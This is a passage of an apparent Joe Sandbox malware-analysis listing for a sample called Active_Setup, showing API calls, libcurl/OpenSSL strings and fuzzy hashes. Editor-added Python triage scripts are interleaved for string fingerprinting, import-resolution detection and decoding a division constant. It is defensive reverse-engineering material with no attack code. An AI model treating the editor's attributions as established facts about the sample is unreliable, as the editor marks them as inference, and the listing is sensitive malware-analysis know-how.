                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _fprintf_raise
                                                                                                                                                  • String ID: %s:%d: rec->data != rec->input$.\ssl\t1_enc.c$n >= 0
                                                                                                                                                  • API String ID: 1988439158-3097570779
                                                                                                                                                  • Opcode ID: 19835143e781a33e3bd4b01cd7c6cdcf3945fdfdfda6086643cce6005c08a6e4
                                                                                                                                                  • Instruction ID: e32cfea323d2a69f787abc0dcee13268a52d5f04116b5c3a0efa2560eaabdb18
                                                                                                                                                  • Opcode Fuzzy Hash: 19835143e781a33e3bd4b01cd7c6cdcf3945fdfdfda6086643cce6005c08a6e4
                                                                                                                                                  • Instruction Fuzzy Hash: D8D1F071E043829BD760DF29C881B6BB7E1BF98310F08496DF9D98B242E735E944C756
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _strncmp
                                                                                                                                                  • String ID: .\ssl\ssl_ciph.c$STRENGTH
                                                                                                                                                  • API String ID: 909875538-4120156686
                                                                                                                                                  • Opcode ID: 11a7e909a950d1803826cbd50ba900a2bde869ee12f5cc4d6fd6e52d3094f521
                                                                                                                                                  • Instruction ID: 73accdceb0dd9dcbd08cdf3b1d100ec704aea39714a74c6ea8c36634e25e8fd8
                                                                                                                                                  • Opcode Fuzzy Hash: 11a7e909a950d1803826cbd50ba900a2bde869ee12f5cc4d6fd6e52d3094f521
                                                                                                                                                  • Instruction Fuzzy Hash: EEB1F2706C83068FE7A4CF1DC48076ABBE9AB85354F08469DF6C58625DD370C586CBA3
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Fputc$H_prolog3_
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2569218679-3916222277
                                                                                                                                                  • Opcode ID: 031924af379c854d58f4ae3709971d9417377ddd6f7ea7f7c5c6d9ad77d7dedb
                                                                                                                                                  • Instruction ID: 0b38aba622bfd35c8d3e09cb6d3003fcb0a82e4d4ac5c714255af932ae59392a
                                                                                                                                                  • Opcode Fuzzy Hash: 031924af379c854d58f4ae3709971d9417377ddd6f7ea7f7c5c6d9ad77d7dedb
                                                                                                                                                  • Instruction Fuzzy Hash: F6519572A00609DFCF15DBA4DCA0DEEB7F5AFD8320F144519E592AB290EB70A904DB50
                                                                                                                                                  APIs
                                                                                                                                                  • curl_msnprintf.ACTIVE_SETUP(?,0000000B,%x%s,00000000,010A2238), ref: 00FD1537
                                                                                                                                                  Strings
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID: curl_msnprintf
• String ID: %x%s$operation aborted by callback$read function returned funny value
• API String ID: 1809024409-2689952269
• Opcode ID: 7076d9725b4814e157d7a23a195daba85187611c18b0e3227fa6ccc119297000
• Instruction ID: 98ce760a886cc48c07cb23749f9cad6ec60da932fc2a9a5587eb190d36002457
• Opcode Fuzzy Hash: 7076d9725b4814e157d7a23a195daba85187611c18b0e3227fa6ccc119297000
• Instruction Fuzzy Hash: 91414D31A00305AFD310DF28EC45BEBB3E5FF99720F88451EE59947340E779A9088792
APIs
Strings
• Added %s:%d:%s to DNS cache, xrefs: 00FB82A2
• %255[^:]:%d:%255s, xrefs: 00FB81BB
• Resolve %s found illegal!, xrefs: 00FB81F0
Memory Dump Source / Joe Sandbox IDA Plugin: same dump and snapshot as the first function above.
Similarity
• API ID: _swscanf
• String ID: %255[^:]:%d:%255s$Added %s:%d:%s to DNS cache$Resolve %s found illegal!
• API String ID: 2748852333-825801415
• Opcode ID: 3ba8aae1f039843305c1e49389fb28c7a4c7fd517a11ebc7c2e255f3df24eb32
• Instruction ID: 916077f3fea93be78f8636034e0337fe2b9d4ace86cb953207a556e6ef2c4236
• Opcode Fuzzy Hash: 3ba8aae1f039843305c1e49389fb28c7a4c7fd517a11ebc7c2e255f3df24eb32
• Instruction Fuzzy Hash: 654103B28047425BC721EA15DC42FEB73E8AFD5394F14491DF98547201EA39E90ADBA2
APIs
Strings
Memory Dump Source / Joe Sandbox IDA Plugin: same dump and snapshot as the first function above.
Similarity
• API ID: _sprintf
• String ID: %s.dll$.\crypto\dso\dso_win32.c
• API String ID: 1467051239-517341328
• Opcode ID: 245e1a78370ce97b427137d9b5645d595c5afb5ae2e68667cacda8a2c39d0124
• Instruction ID: 01d465793b1f3701b78934282fc0be5e7ad7a95c4a8b15675c847c86dc2a6388
• Opcode Fuzzy Hash: 245e1a78370ce97b427137d9b5645d595c5afb5ae2e68667cacda8a2c39d0124
• Instruction Fuzzy Hash: 62218E77B8031267DB51969DDC82F9773D49FA2B51F0C00B4FEC0EF201E7A0A41492A2
APIs
Strings
Memory Dump Source / Joe Sandbox IDA Plugin: same dump and snapshot as the first function above.
Similarity
• API ID: _memset
• String ID: .\crypto\buffer\buffer.c
• API String ID: 2102423945-294840303
• Opcode ID: a19e1e605443f8cc0e0dddd07d9a92ff9026ed403daec4f3e5aee453307262d2
• Instruction ID: dc998416f563cde745bb9eb1940823a8cf9fe2414125694b495d419542ae213a
• Opcode Fuzzy Hash: a19e1e605443f8cc0e0dddd07d9a92ff9026ed403daec4f3e5aee453307262d2
• Instruction Fuzzy Hash: A321FCB2B803117BD6106A6DFC82B96F399DB94F60F048535F65CEB7C1E2B4AC1582D0
APIs
• LoadLibraryA.KERNEL32(00000000), ref: 0105230A
• FreeLibrary.KERNEL32(00000000), ref: 010523B0
Strings
Memory Dump Source / Joe Sandbox IDA Plugin: same dump and snapshot as the first function above.
Similarity
• API ID: Library$FreeLoad
• String ID: .\crypto\dso\dso_win32.c$filename(
• API String ID: 534179979-1090210371
• Opcode ID: c576b67fd58924b8ec6436e59f24b4e634b3e2351bcf6ad7bf44e353ed13ea8b
• Instruction ID: a80d6e40f3b8668122dc784d3d640fc30df1deff21424442547e94a68751b167
• Opcode Fuzzy Hash: c576b67fd58924b8ec6436e59f24b4e634b3e2351bcf6ad7bf44e353ed13ea8b
• Instruction Fuzzy Hash: 61212CB6BC030176E37039A56C47F5736894B50FA1F084076FF88AD2C3EAE5900451E5
APIs
Strings
Memory Dump Source / Joe Sandbox IDA Plugin: same dump and snapshot as the first function above.
Similarity
• API ID: _getenv
• String ID: ENV$default
• API String ID: 3834326495-1320007843
• Opcode ID: 6c5ba34abd1c6c094a9986d34761cd3165354b820abc9510f5b7d25d98438ff5
• Instruction ID: cf441c1976374194abdcf9c39650e594b10e1b58284cb2e0395c6c9916cea0d4
• Opcode Fuzzy Hash: 6c5ba34abd1c6c094a9986d34761cd3165354b820abc9510f5b7d25d98438ff5
• Instruction Fuzzy Hash: FC21D7B26082015BD611DE7CACC0A7BBBD6AE94558F4845B9EDC4CB212E712D50DC2D2
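Added triage example (editor's code, not part of the Joe Sandbox report or of the sample): the functions listed above carry plaintext diagnostic strings such as `Added %s:%d:%s to DNS cache`, `%255[^:]:%d:%255s`, `operation aborted by callback`, `.\crypto\dso\dso_win32.c` and `.\crypto\err\err.c`. The attribution of these strings to statically linked libcurl (DNS-cache and transfer messages, `curl_msnprintf`) and a Windows build of OpenSSL (the `.\crypto\...` source paths) is the editor's inference, not a statement made by the report. Because such library strings stay in the clear even when a stealer encrypts its own strings, they make a cheap fingerprint for triage. The script below scans a memory dump for these markers, reports them at virtual addresses comparable to the `xrefs` above when given the dump's load base, and only calls a library "embedded" when several distinct markers are present. The sample dump bytes are constructed for this example.

```python
"""Fingerprint statically linked libcurl / OpenSSL in a memory dump by the
diagnostic strings seen in the function listing (editor's triage example)."""
import re
from typing import Dict, List

# Marker strings copied from the function listing, grouped by the library the
# editor attributes them to (assumption: libcurl and a Windows build of
# OpenSSL; the report itself only lists the strings).
LIBRARY_MARKERS: Dict[str, List[bytes]] = {
    "libcurl": [
        b"Added %s:%d:%s to DNS cache",
        b"%255[^:]:%d:%255s",
        b"Resolve %s found illegal!",
        b"operation aborted by callback",
        b"read function returned funny value",
    ],
    "openssl": [
        b".\\crypto\\dso\\dso_win32.c",
        b".\\crypto\\buffer\\buffer.c",
        b".\\crypto\\err\\err.c",
    ],
}


def find_markers(dump: bytes, base: int = 0) -> Dict[str, Dict[str, List[int]]]:
    """Return {library: {marker: [virtual addresses]}} for every marker found.

    `base` is the load address of the dump (0x00FB0000 for the dump this
    listing was taken from), so reported addresses line up with the xrefs in
    the report rather than with raw file offsets.
    """
    hits: Dict[str, Dict[str, List[int]]] = {}
    for lib, markers in LIBRARY_MARKERS.items():
        for marker in markers:
            addrs = [base + m.start() for m in re.finditer(re.escape(marker), dump)]
            if addrs:
                hits.setdefault(lib, {})[marker.decode("ascii")] = addrs
    return hits


def classify(dump: bytes, base: int = 0, min_hits: int = 2) -> List[str]:
    """Name a library as embedded only when at least `min_hits` distinct
    markers are present, so a single coincidental format string does not
    trigger a false positive."""
    found = find_markers(dump, base)
    return sorted(lib for lib, markers in found.items() if len(markers) >= min_hits)


# Constructed sample: a fake .rdata blob holding some of the listing's strings.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"Added %s:%d:%s to DNS cache\x00"
    + b"%255[^:]:%d:%255s\x00"
    + b".\\crypto\\dso\\dso_win32.c\x00"
    + b".\\crypto\\err\\err.c\x00"
    + b"unrelated string\x00"
)

if __name__ == "__main__":
    for lib, markers in find_markers(SAMPLE_DUMP, base=0x00FB0000).items():
        for text, addrs in markers.items():
            print(f"{lib:8s} {text!r} at {', '.join(hex(a) for a in addrs)}")
    print("embedded libraries:", classify(SAMPLE_DUMP))
```

To run it against the real dump, read the `.sdmp` file listed under Memory Dump Source as bytes and pass `base=0x00FB0000`; the addresses printed for the DNS-cache strings should then fall near the `xrefs` shown in the listing.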
Strings
Memory Dump Source / Joe Sandbox IDA Plugin: same dump and snapshot as the first function above.
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .\crypto\err\err.c$unknown
                                                                                                                                                  • API String ID: 0-565200744
                                                                                                                                                  • Opcode ID: 71af75dd33bef2bd78c96bd24453f8251a2b8706932af9eec9ef54b4190c78e6
                                                                                                                                                  • Instruction ID: 8c63f27233a6fd2232c10c3d56a978f99182281b0532603b444c06012b5105b9
                                                                                                                                                  • Opcode Fuzzy Hash: 71af75dd33bef2bd78c96bd24453f8251a2b8706932af9eec9ef54b4190c78e6
                                                                                                                                                  • Instruction Fuzzy Hash: 1511B9B1FC0305BAFA303A55AC47F567552BB61F25F890019F6C82D2C3D5F71590D2A2
Strings
• finalized the digest!, xrefs: 00FB4C39
• MD5::hex_digest: Can't get digest if you haven't , xrefs: 00FB4C3F
• %02x, xrefs: 00FB4CC8
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Similarity
• API ID: _sprintf
• String ID: %02x$MD5::hex_digest: Can't get digest if you haven't $finalized the digest!
• API String ID: 1467051239-1020120221
• Opcode ID: f7fd73026229fef039e7cc749a771f85743498e0ca48228e7244a3971214b4f8
• Instruction ID: bfe3ed52cbe2e97e8169af16db98822d71fcfac5eb6e0f359d7fa12ba0670175
• Opcode Fuzzy Hash: f7fd73026229fef039e7cc749a771f85743498e0ca48228e7244a3971214b4f8
• Instruction Fuzzy Hash: 3C113DB1F001545BD710A66ADC45FA63B949B95B28F19016CF589CF383E676EC068790
Strings
• SSL_write() return error %d, xrefs: 00FC8F7D
• SSL_write() error: %s, xrefs: 00FC8F6C
• SSL_write() returned SYSCALL, errno = %d, xrefs: 00FC8F52
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Similarity
• API ID:
• String ID: SSL_write() error: %s$SSL_write() return error %d$SSL_write() returned SYSCALL, errno = %d
• API String ID: 0-1841518057
• Opcode ID: 257e0fa1f8e998f6ac321f23e1a6a6ae856114fa41fe3696a1711c4eccb1fdc6
• Instruction ID: 3a9fe6e3b12f58b5cd58ad853e1c6e68f982017ec65328081ad215545a05c60f
• Opcode Fuzzy Hash: 257e0fa1f8e998f6ac321f23e1a6a6ae856114fa41fe3696a1711c4eccb1fdc6
• Instruction Fuzzy Hash: 29210371504246ABE320EB64DC42FBB739AFF84360F64461DF95487242DF35A814DBA2
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Similarity
• API ID: __aulldiv__aulldvrm__aullrem
• String ID: %.14s.%03dZ
• API String ID: 1415644573-1077646249
• Opcode ID: 56bd540ac7257e70478fef8315dd458273becd480727a273f4a34b59942a5c5b
• Instruction ID: bf5be8146cd09fa444e9ea291f7fc4bee8f0e8092045e45691e0af4940b5b62f
• Opcode Fuzzy Hash: 56bd540ac7257e70478fef8315dd458273becd480727a273f4a34b59942a5c5b
• Instruction Fuzzy Hash: AC11C6716453443BE214FB61CC82FAF73DCEF55B44F400418F6846A181DA79EA0057EA
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Similarity
• API ID: ErrorLastrecv
• String ID: 3'$Recv failure: %s
• API String ID: 2514157807-3205223812
• Opcode ID: dfe31e05dcdda7064b95b5153cf0b6c29900c5e724c8ac9d77d88a27bad36920
• Instruction ID: f33419e31cee616a17a88a8d042fc414664eee727feb5f595484f07b21540366
• Opcode Fuzzy Hash: dfe31e05dcdda7064b95b5153cf0b6c29900c5e724c8ac9d77d88a27bad36920
• Instruction Fuzzy Hash: 8101BCB52043056FC7209B18EC85F9AB7E8FBC9322F00845AF984C7281C63AA8108B61
APIs
• ___BuildCatchObject.LIBCMT ref: 010915E2
  • Part of subcall function 0109153D: ___BuildCatchObjectHelper.LIBCMT ref: 01091573
• _UnwindNestedFrames.LIBCMT ref: 010915F9
• ___FrameUnwindToState.LIBCMT ref: 01091607
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Similarity
• API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
• String ID: csm
• API String ID: 2163707966-1018135373
• Opcode ID: 13d54e85cf837ba33ea047a1f7b8a7af02b4cf8102853979aa4b33b8047b31c1
• Instruction ID: 91ae5ed6b8d3a677032f229c424a65f4ab42bf147ac80ec75abe56948759b4f9
• Opcode Fuzzy Hash: 13d54e85cf837ba33ea047a1f7b8a7af02b4cf8102853979aa4b33b8047b31c1
• Instruction Fuzzy Hash: 8E01E47150050BFBDF226E51CC54EEA7FAAEF183A0F054050BD9955120DB369AB2EBA0
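As an added worked example, not part of the Joe Sandbox report: a small Python parser for the per-function records in this section (the "APIs", "Strings", "Memory Dump Source" and "Similarity" fields), followed by a triage pass that pulls run-time API resolution (GetModuleHandle/GetProcAddress call sites and the name being resolved) out of the parsed call lists. The sample input is constructed from records copied from the entries above; the record layout it assumes (a record ends at its "Instruction Fuzzy Hash" field, a record cut off before that field is still kept) is inferred from this page, and DYNAMIC_RESOLVERS is my own list of resolver APIs, not something the report defines.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample: three per-function records copied from the entries above (the bullets
# and field names are the report's own). The last record stops before its
# "Instruction Fuzzy Hash" line, exactly as the final entry of this section does.
SAMPLE = """\
Strings
• finalized the digest!, xrefs: 00FB4C39
• MD5::hex_digest: Can't get digest if you haven't , xrefs: 00FB4C3F
• %02x, xrefs: 00FB4CC8
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Similarity
• API ID: _sprintf
• String ID: %02x$MD5::hex_digest: Can't get digest if you haven't $finalized the digest!
• Instruction Fuzzy Hash: 3C113DB1F001545BD710A66ADC45FA63B949B95B28F19016CF589CF383E676EC068790
APIs
• ___BuildCatchObject.LIBCMT ref: 010915E2
  • Part of subcall function 0109153D: ___BuildCatchObjectHelper.LIBCMT ref: 01091573
• _UnwindNestedFrames.LIBCMT ref: 010915F9
Strings
Similarity
• API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
• Instruction Fuzzy Hash: 8E01E47150050BFBDF226E51CC54EEA7FAAEF183A0F054050BD9955120DB369AB2EBA0
APIs
• GetModuleHandleA.KERNEL32(KERNEL32,010825D4), ref: 0108F123
• GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0108F133
Strings
"""

SECTION_HEADINGS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
TERMINATOR = "Instruction Fuzzy Hash"  # last field of every complete record (assumed from this page)
API_RE = re.compile(  # "Name.MODULE(arg,arg), ref: ADDR", with an optional subcall prefix
    r"^(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+): )?"
    r"(?P<name>[^.(\s]+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)

@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str                   # call-site address
    parent: str | None = None  # set when the report lists the call under a subcall function

@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[tuple[str, str]] = field(default_factory=list)  # (text, xref address)
    fields: dict[str, str] = field(default_factory=dict)          # Source File, API ID, hashes

def parse_records(text: str) -> list[FunctionRecord]:
    """Split report text into one FunctionRecord per function block."""
    records: list[FunctionRecord] = []
    cur, section = FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTION_HEADINGS:
            section = line
            continue
        if not line.startswith("•"):
            continue  # blank lines and anything that is not a bullet field
        body = line[1:].strip()
        if section == "APIs":
            m = API_RE.match(body)
            if m:
                args = [a for a in (m["args"] or "").split(",") if a]
                cur.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["parent"]))
        elif section == "Strings":
            text_, sep, xref = body.rpartition(", xrefs: ")
            if sep:
                cur.strings.append((text_, xref))
        else:
            key, _, value = body.partition(":")
            cur.fields[key.strip()] = value.strip()
            if key.strip() == TERMINATOR:
                records.append(cur)
                cur, section = FunctionRecord(), None
    if cur.apis or cur.strings or cur.fields:
        records.append(cur)  # record cut off before its terminator
    return records

# My own list of APIs that resolve imports at run time; not taken from the report.
DYNAMIC_RESOLVERS = {"GetProcAddress", "GetModuleHandleA", "GetModuleHandleW",
                     "LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}

def dynamic_api_resolution(records: list[FunctionRecord]) -> list[tuple[str, str, str | None]]:
    """(call site, resolver, resolved name) for every run-time API lookup. The report prints
    GetProcAddress's name argument as text when it is a literal, so it can be recovered."""
    hits = []
    for rec in records:
        for c in rec.apis:
            if c.name in DYNAMIC_RESOLVERS:
                target = c.args[1] if c.name == "GetProcAddress" and len(c.args) == 2 else None
                hits.append((c.ref, c.name, target))
    return hits

if __name__ == "__main__":
    for ref, resolver, target in dynamic_api_resolution(parse_records(SAMPLE)):
        print(f"{ref}: {resolver} -> {target}")
```

Running the file prints the two resolver call sites from the last record. The fuzzy hashes and IDs stay in each record's `fields`, so the same records can be keyed by Opcode Fuzzy Hash or API String ID for similarity look-ups across samples.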
APIs
• GetModuleHandleA.KERNEL32(KERNEL32,010825D4), ref: 0108F123
• GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0108F133
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                  • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                  • API String ID: 1646373207-3105848591
                                                                                                                                                  • Opcode ID: 0e72ff6037053c4965a438d79254ee2e42230d185d32d1429691df05c2e1c497
                                                                                                                                                  • Instruction ID: 7f925b5e7effdb357817a07468be6b927976d41798bc3acbc2fccb50fcaca967
                                                                                                                                                  • Opcode Fuzzy Hash: 0e72ff6037053c4965a438d79254ee2e42230d185d32d1429691df05c2e1c497
                                                                                                                                                  • Instruction Fuzzy Hash: E2F01D30A04B0AD6DF102BB5A80E6AE7EB9BB81746F824494A6D1E00C8DE3580B58355
APIs
• GetSystemTime.KERNEL32(-00000013,00000000,01077285), ref: 01076E80
• SystemTimeToFileTime.KERNEL32(?,?), ref: 01076E90
• __aulldvrm.LIBCMT ref: 01076EB2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID: Time$System$File__aulldvrm
• String ID: gfff
• API String ID: 239608527-1553575800
• Opcode ID: 52b7e7a529192d17a41e7262a0bdf42a2f16b78ea7c06cd145322883fc2baf5b
• Instruction ID: 5b7bbc7c086765c7cefdde002473c550c67b3a7345021c5b9b8c63d3d136c5fa
• Opcode Fuzzy Hash: 52b7e7a529192d17a41e7262a0bdf42a2f16b78ea7c06cd145322883fc2baf5b
• Instruction Fuzzy Hash: 0FF036B55043066BC708EF99DC85A9BBBE8FBC4704F04CC1DF5C9C6290E634E5049752
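The GetSystemTime, SystemTimeToFileTime and __aulldvrm chain in the entry above is the usual way a Windows binary derives a Unix-style timestamp without calling the CRT's time(): the FILETIME (100 ns ticks since 1601) is rebased to 1970 and divided by 10,000,000, and __aulldvrm returns both quotient and remainder. The four-byte string "gfff" listed under Similarity is the little-endian immediate 0x66666667, which MSVC emits for signed 32-bit division by 10. The example below is added here and is not code from the sample or from Joe Sandbox; it reproduces that arithmetic in plain Python so the constants can be checked offline. Two points are the editor's assumptions, not facts the report states: that the 64-bit divide is the epoch conversion, and that the magic constant belongs to a division by 10 elsewhere in the same function.

```python
"""Check what GetSystemTime -> SystemTimeToFileTime -> __aulldvrm computes and
decode the 'gfff' constant.  Added example, not code from the sample or Joe
Sandbox.  ASSUMPTIONS: the divide is FILETIME -> Unix seconds, and 'gfff' is
the MSVC magic multiplier for x / 10 (the report shows only the calls)."""
import struct

EPOCH_DELTA_100NS = 116444736000000000   # 1601-01-01 to 1970-01-01 in 100 ns ticks
TICKS_PER_SECOND = 10_000_000


def filetime_to_unix(filetime):
    """Return (seconds since 1970, leftover 100 ns ticks), i.e. the quotient and
    remainder an __aulldvrm-style unsigned 64-bit division would yield."""
    return divmod(filetime - EPOCH_DELTA_100NS, TICKS_PER_SECOND)


def unix_to_filetime(seconds):
    return seconds * TICKS_PER_SECOND + EPOCH_DELTA_100NS


def decode_immediate(s):
    """A 4-character 'string' sitting next to a division is usually a
    little-endian immediate: 'gfff' -> 0x66666667."""
    return struct.unpack("<I", s.encode("ascii"))[0]


def magic_div(x, magic, shift):
    """Emulate MSVC's signed 32-bit sequence: imul magic; sar edx, shift;
    then add the sign bit so the result truncates toward zero like C."""
    assert -2**31 <= x < 2**31
    hi = (x * magic) >> 32      # high dword of the 64-bit product (arithmetic shift)
    q = hi >> shift
    if q < 0:                   # the 'shr eax,31 / add edx,eax' fix-up
        q += 1
    return q


def trunc_div(x, d):
    q = abs(x) // d
    return q if x >= 0 else -q


def identify_divisor(magic, shift, limit=1000):
    """Recover the constant divisor that a (magic, shift) pair implements by
    comparing the emulated sequence against candidate divisors."""
    samples = list(range(-1000, 1000)) + [2**31 - 1, -2**31, 123456789, -987654321]
    for d in range(2, limit):
        if all(magic_div(x, magic, shift) == trunc_div(x, d) for x in samples):
            return d
    return None


if __name__ == "__main__":
    magic = decode_immediate("gfff")
    print(hex(magic), "divides by", identify_divisor(magic, 2))
    print("2000-01-01 as FILETIME ->", filetime_to_unix(125911584000000000))
```

The magic-multiplier check is the more reusable part: when a function lists a short printable "string" such as gfff next to imul/sar arithmetic, decoding it as an immediate and running identify_divisor tells you which constant the compiler folded away, which is often enough to recognise a timestamp, a percentage or a buffer-size computation without reading the whole routine.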
APIs
• __EH_prolog3.LIBCMT ref: 0109A1B6
• std::bad_exception::bad_exception.LIBCMT ref: 0109A1D3
• __CxxThrowException@8.LIBCMT ref: 0109A1E1
